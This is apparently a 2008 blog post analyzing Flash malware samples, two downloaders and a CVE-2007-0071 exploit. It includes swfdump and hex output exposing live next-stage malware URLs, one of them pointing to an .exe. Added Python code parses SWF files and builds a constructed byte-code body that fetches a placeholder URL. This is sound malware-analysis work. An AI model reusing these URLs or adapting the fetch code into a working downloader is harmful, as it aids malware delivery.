Posted by: realsecurity | September 21, 2008

Flash malware – downloaders and exploit

Watching a recent SANS webcast by Lenny Zeltser piqued my curiosity in Flash-based malware. I decided to have a closer look at some Flash-based malware which I had collected, to try and gain some more insight into how to analyze it. I’ll cover 3 samples and what I was able to find out about them.

Generally, Flash malware is pretty challenging to analyze. The tools that are available are not as mature as their executable or JavaScript cousins. I had to use a variety of tools, some free, some commercial. Analyzing a Flash file statically involves disassembling the SWF and/or dumping its contents using swfdump. It is also possible to do some additional analysis using the debugger built into Adobe Flash CS3 (30 day trial version available).

Analysis difficulties

Most flash malware is written using action script 8 or 9. Many free tools will work with one version or the other, but not both. I opted for a commercial tool (swf decompiler) so as not to worry about this issue. Due to the way the malware is written many tools do not produce an accurate disassembly. The CS3 debugger was unable to handle the files I threw at it because of the way they were written.

Please keep in mind that many flash analysis tools are not specifically meant to handle malware. Many flash tools will automatically play the swf movie once you load it. Analysis should be done in a VM with the network card disabled.

Tools

swftools (swfdump)
Sothink SWF Decompiler
Adobe Flash CS3

4562.swf
MD5 – 77AEB0248AD3BBD7B0CA5CFBEBEEEC05
Virus total results

Our first sample is a downloader/redirector written in Flash. Running swfdump on the file yields some great information. I found this sample at least a month or two ago, so I’m surprised AV detection is still so terrible.

[HEADER] File version: 8
[HEADER] File is zlib compressed. Ratio: 42%
[HEADER] File size: 1790
[HEADER] Frame count: 1
[….]
( 52 bytes) action: Constantpool(5 entries) String:”v” String:”/:$version” String:”http://www.seove.com.cn/” String:”f.swf” String:”_root”

This tells us the file uses flash 8 (action script 2), it has been compressed, is 1790 bytes and contains one frame (movie frame). It is pretty clear that the movie contacts seove.com.cn to download additional content, but how is the URL put together?

First, the SWF must be dumped into FLA format for analysis. Once decompiled, we can import it into CS3 and debug. The problem, however, is that the debugger throws a few errors relating to the strange hex characters used in the script (\x01, \x02, \x04, \x05). These characters are not printable; see this ASCII chart for details. The debugger does, however, show us the contents of the $version variable, which is the key to the puzzle.


Since the debugger won’t work, we can use another technique. The Flash player has an option called “simulate download” which causes the movie to run. The output window in CS3 then returns the full URL that it is trying to connect to!


ie.swf
MD5 – 2A757228062D69539086F4E72883083A
Virus total results

This is a new sample from a few days ago. It is used as a downloader/redirector as well. AV detection is nonexistent.

[HEADER] File version: 9
[HEADER] File size: 142
[HEADER] Frame count: 1
[….]
[00c] 97 DOACTION
( 2 bytes) action: Jump 44
( 0 bytes) action: BitLShift
( 0 bytes) action: unknown[02]
( 0 bytes) action: End
-=> 99 02 00 2c 00 63 02 00 00 00 96 04 00 08 00 08 ™..,.c….–…..
-=> 01 1c 3c 96 02 00 08 00 1c 96 02 00 08 02 47 96 ..
-=> 02 00 08 03 1c 9a 01 00 40 07 00 00 63 02 00 fc …..š..@…c..ü
-=> ff 88 28 00 04 00 66 6c 61 73 68 63 63 56 65 72 ÿˆ(…flashccVer
-=> 73 69 6f 6e 00 2f 3a 24 76 65 72 73 69 6f 6e 00 sion./:$version.
-=> 69 2e 73 77 66 00 5f 72 6f 6f 74 00 99 02 00 a9 i.swf._root.™..©

This is a much more compact sample: only 142 bytes in size, and it uses Flash 9 (action script 3). SWF Decompiler did not produce a detailed enough disassembly of this file, so I could only use the simulate download method on it. Again, this uses $version and references “flashcc”.


This time the malware doesn’t give us the full URL in the output window, but it is good enough to lead us to the next file. Just do a search for a flashcc domain and append the rest of the URL.
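What a linear disassembly misses in the dump above is worth seeing in code. The following is an added example, not code from the original post or from any of the tools mentioned: a small Python walker for ActionScript 2 byte-code that follows Jump records instead of reading the stream top to bottom. A DoAction body laid out like the one above (a forward Jump, a few stray bytes and an End, with the ConstantPool parked after that End) gives a linear walker nothing but “Jump, End”; following the jump lands on the pool and then on the real code. The action bytes and pool strings below are constructed here, and the URL is a placeholder, not one from the samples.

```python
"""Added example, not code from the original post: an ActionScript 2
byte-code walker that follows Jump records, so a ConstantPool hidden
behind a decoy End record (the layout seen in the ie.swf dump) is still
recovered.  The DoAction body it walks is constructed below with
placeholder strings."""
import struct

ACT_END, ACT_STRINGADD = 0x00, 0x47
ACT_CONSTANTPOOL, ACT_PUSH, ACT_JUMP, ACT_GETURL2 = 0x88, 0x96, 0x99, 0x9A


def walk_actions(actions, follow_jumps=True):
    """Return (opcodes_visited, constant_pool_strings).

    Records with opcode >= 0x80 carry a 16-bit little-endian payload length;
    Jump's payload is a signed 16-bit offset relative to the next record.
    The visited set keeps a hostile stream from looping the walker forever."""
    pos, seen, opcodes, pool = 0, set(), [], []
    while 0 <= pos < len(actions) and pos not in seen:
        seen.add(pos)
        op = actions[pos]
        if op >= 0x80:
            length = struct.unpack_from("<H", actions, pos + 1)[0]
            payload = actions[pos + 3:pos + 3 + length]
            nxt = pos + 3 + length
        else:
            payload, nxt = b"", pos + 1
        opcodes.append(op)
        if op == ACT_END:
            break
        if op == ACT_CONSTANTPOOL:
            count = struct.unpack_from("<H", payload, 0)[0]
            pool = [s.decode("latin-1") for s in payload[2:].split(b"\x00")[:count]]
        if op == ACT_JUMP and follow_jumps:
            nxt += struct.unpack_from("<h", payload, 0)[0]
        pos = nxt
    return opcodes, pool


def record(op, payload=b""):
    """Encode one action record (opcodes >= 0x80 carry a length field)."""
    if op >= 0x80:
        return bytes([op]) + struct.pack("<H", len(payload)) + payload
    return bytes([op])


def push_const8(*indices):
    """Push record whose entries are type 8 (constant-pool index) values."""
    return record(ACT_PUSH, b"".join(bytes([8, i]) for i in indices))


def build_actions(strings):
    """Constructed DoAction body: Jump over a decoy End to the ConstantPool,
    then Jump back to the real code, which joins two pool strings into a URL
    and hands it to GetURL2 (the loadMovie-style fetch the downloaders use)."""
    pool = struct.pack("<H", len(strings)) + b"".join(s.encode() + b"\x00" for s in strings)
    pool_rec = record(ACT_CONSTANTPOOL, pool)
    decoy = record(ACT_END)                      # a linear walk stops here
    code = (push_const8(2, 3) + record(ACT_STRINGADD)        # url + "f.swf"
            + push_const8(4) + record(ACT_GETURL2, b"\x40")  # target "_root", flags byte
            + record(ACT_END))
    fwd = record(ACT_JUMP, struct.pack("<h", len(decoy) + len(code)))
    code_start = len(fwd) + len(decoy)
    back_next = code_start + len(code) + len(pool_rec) + 5   # record after the back Jump
    back = record(ACT_JUMP, struct.pack("<h", code_start - back_next))
    return fwd + decoy + code + pool_rec + back


# Constructed pool; the URL is a placeholder, not one from the samples.
SAMPLE_POOL = ["v", "/:$version", "http://example.invalid/", "f.swf", "_root"]

if __name__ == "__main__":
    body = build_actions(SAMPLE_POOL)
    print("linear walk:    ", walk_actions(body, follow_jumps=False))
    print("following jumps:", walk_actions(body))
```

Run stand-alone, the linear walk reports only Jump and End with an empty pool, while the jump-following walk returns the full pool and the Push/StringAdd/GetURL2 sequence that actually builds the request.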

i47.swf
MD5 – 91428BA59E7234267DA42F9B93F00851
Virus total results

Our last sample is an exploit for CVE-2007-0071. A great analysis of this exploit is covered by Zarestel. Debugging this sample wasn’t possible as it crashed CS3. Only swfdump provided good information.

==== Error: Real Filesize (1664) doesn’t match header Filesize (1544) ====
[HEADER] File version: 9
[HEADER] File size: 1544
[HEADER] Frame count: 771
[….]
-=> 5e b2 5e 00 68 74 74 70 3a 2f 2f 73 64 66 73 64 ^²^.http://sdfsd
-=> 33 33 2e 63 6e 2f 78 7a 2f 78 2e 65 78 65 00 00 33.cn/xz/x.exe..
[….]
-=> 74 74 74 74 74 74 74 74 74 74 74 63 73 61 66 65 tttttttttttcsafe
-=> 79 75 74 69 61 6e 51 51 3a 35 33 36 36 37 37 37 yutianQQ:5366XXXX
-=> 74 74 74 74 tttt

The next stage payload is easily visible here. Also, the malware author is kind enough to leave their QQ contact number at the end of the file.
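For readers who want to reproduce the swfdump checks used throughout this post without the tool, here is an added example (not code from the post or from swftools): it parses the SWF header the way the [HEADER] lines above describe it (FWS/CWS signature, version, zlib decompression, declared versus real file size, frame count), walks the tag list, and pulls printable strings out of the decompressed body, which is how the next-stage URL surfaces in the i47.swf dump. The file it parses is constructed inside the script; the URL in it is a placeholder, not one from the samples.

```python
"""Added example, not code from the original post: a stand-alone SWF header
and tag-list parser covering what swfdump reported for the samples (version,
zlib compression, declared vs. real file size, frame count) plus a printable
strings pass over the decompressed body.  The SWF is constructed below."""
import struct
import zlib

DOACTION, SHOWFRAME, END_TAG = 12, 1, 0


def parse_header(data):
    """Header facts plus the decompressed body that follows the 8-byte header."""
    sig, version = data[:3], data[3]
    declared = struct.unpack_from("<I", data, 4)[0]  # uncompressed file length
    if sig == b"CWS":
        body = zlib.decompress(data[8:])
    elif sig == b"FWS":
        body = data[8:]
    else:
        raise ValueError("not an FWS/CWS file: %r" % sig)
    nbits = body[0] >> 3                 # RECT: 5-bit Nbits, then four fields
    rect_len = (5 + 4 * nbits + 7) // 8
    real = 8 + len(body)                 # swfdump's "Real Filesize"
    return {
        "version": version,
        "compressed": sig == b"CWS",
        "declared_size": declared,
        "real_size": real,
        "size_mismatch": declared != real,   # the warning on the third sample
        "frame_rate": body[rect_len + 1] + body[rect_len] / 256.0,  # 8.8 fixed
        "frame_count": struct.unpack_from("<H", body, rect_len + 2)[0],
        "tags_offset": rect_len + 4,
        "body": body,
    }


def iter_tags(body, offset):
    """Yield (code, payload) per RECORDHEADER; stops after the End tag."""
    while offset + 2 <= len(body):
        code_len = struct.unpack_from("<H", body, offset)[0]
        code, length = code_len >> 6, code_len & 0x3F
        offset += 2
        if length == 0x3F:               # long form: 32-bit length follows
            length = struct.unpack_from("<I", body, offset)[0]
            offset += 4
        yield code, body[offset:offset + length]
        offset += length
        if code == END_TAG:
            return


def printable_strings(blob, min_len=6):
    """Runs of printable ASCII, the 'strings' view of the hex dumps above."""
    out, run = [], bytearray()
    for b in blob + b"\x00":             # trailing NUL flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out


def triage(data):
    """Header facts, the tag codes present, and printable strings."""
    info = parse_header(data)
    body = info.pop("body")
    info["tags"] = [code for code, _ in iter_tags(body, info["tags_offset"])]
    info["strings"] = printable_strings(body)
    return info


def tag(code, payload=b""):
    """Encode a RECORDHEADER, long form when the payload is 63 bytes or more."""
    if len(payload) < 0x3F:
        return struct.pack("<H", (code << 6) | len(payload)) + payload
    return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload


def build_sample(compress=False, trailing=b""):
    """Constructed one-frame Flash 8 SWF: 550x400 px stage, 12 fps, one DoAction
    tag that only declares a ConstantPool with a placeholder URL.  Bytes passed
    in `trailing` make the real size disagree with the header, as in i47.swf."""
    nbits = 15                           # RECT fields in twips, 15 bits each
    rect = (nbits << 60) | (0 << 45) | (11000 << 30) | (0 << 15) | 8000
    rect_bytes = (rect << 7).to_bytes(9, "big")   # 65 bits, left-aligned
    strings = [b"/:$version", b"http://example.invalid/", b"f.swf", b"_root"]
    pool = struct.pack("<H", len(strings)) + b"".join(s + b"\x00" for s in strings)
    actions = b"\x88" + struct.pack("<H", len(pool)) + pool + b"\x00"  # ConstantPool, End
    body = (rect_bytes + b"\x00\x0c" + struct.pack("<H", 1)            # 12.0 fps, 1 frame
            + tag(DOACTION, actions) + tag(SHOWFRAME) + tag(END_TAG))
    header = b"\x08" + struct.pack("<I", 8 + len(body))  # version 8, declared size
    body += trailing
    if compress:
        return b"CWS" + header + zlib.compress(body)
    return b"FWS" + header + body
```

Running triage() over build_sample(compress=True) gives the same facts swfdump printed for 4562.swf (version 8, zlib compressed, one frame), and build_sample(trailing=...) reproduces the “Real Filesize doesn’t match header Filesize” condition seen on i47.swf, which is a cheap first indicator that a file has been tampered with or padded.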

Happy hunting!
